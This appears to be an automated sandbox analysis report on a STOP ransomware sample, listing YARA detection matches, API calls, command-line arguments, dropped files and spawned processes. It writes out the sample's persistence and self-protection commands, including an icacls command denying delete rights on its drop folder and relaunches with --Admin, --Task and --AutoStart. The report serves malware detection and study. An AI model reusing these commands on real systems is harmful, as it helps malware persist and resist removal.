              Source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000000.1853038508.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000000.1771375510.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000002.1865701923.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000002.1800921924.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6828, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5776, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5644, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5104, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPEDMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: classification engine, Classification label: mal100.rans.spre.troj.evad.winEXE@9/1138@3/2
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Code function: 0_2_00F21900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,0_2_00F21900
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Code function: 0_2_00F22440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00F22440
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Code function: 0_2_00F1D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,0_2_00F1D240
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Admin, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: IsAutoStart, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: IsTask, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --ForNetRes, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Task, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --AutoStart, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Service, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: C:\Windows\, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: D:\Windows\, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: %username%, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: F:\, 0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Admin, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: IsAutoStart, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: IsTask, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --ForNetRes, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Task, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --AutoStart, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Service, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: C:\Windows\, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: D:\Windows\, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: %username%, 2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: F:\, 2_2_00F29F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Admin, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: IsAutoStart, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: IsTask, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --ForNetRes, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Task, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --AutoStart, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Service, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: C:\Windows\, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: D:\Windows\, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: %username%, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: F:\, 3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --Admin, 4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: IsAutoStart, 4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: IsTask, 4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Command line argument: --ForNetRes, 4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Task4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --AutoStart4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Service4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: C:\Windows\4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: D:\Windows\4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: %username%4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: F:\4_2_00F19F90
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeReversingLabs: Detection: 86%
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeVirustotal: Detection: 78%
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeString found in binary or memory: set-addPolicy
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile read: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: unknownProcess created: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess created: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --Admin IsNotAutoStart IsNotTask
              Source: unknownProcess created: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe --Task
              Source: unknownProcess created: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
              Source: unknownProcess created: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic file information: File size 1150976 > 1048576
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\20\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errortorage\CacheStorage.edb.tgvve\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
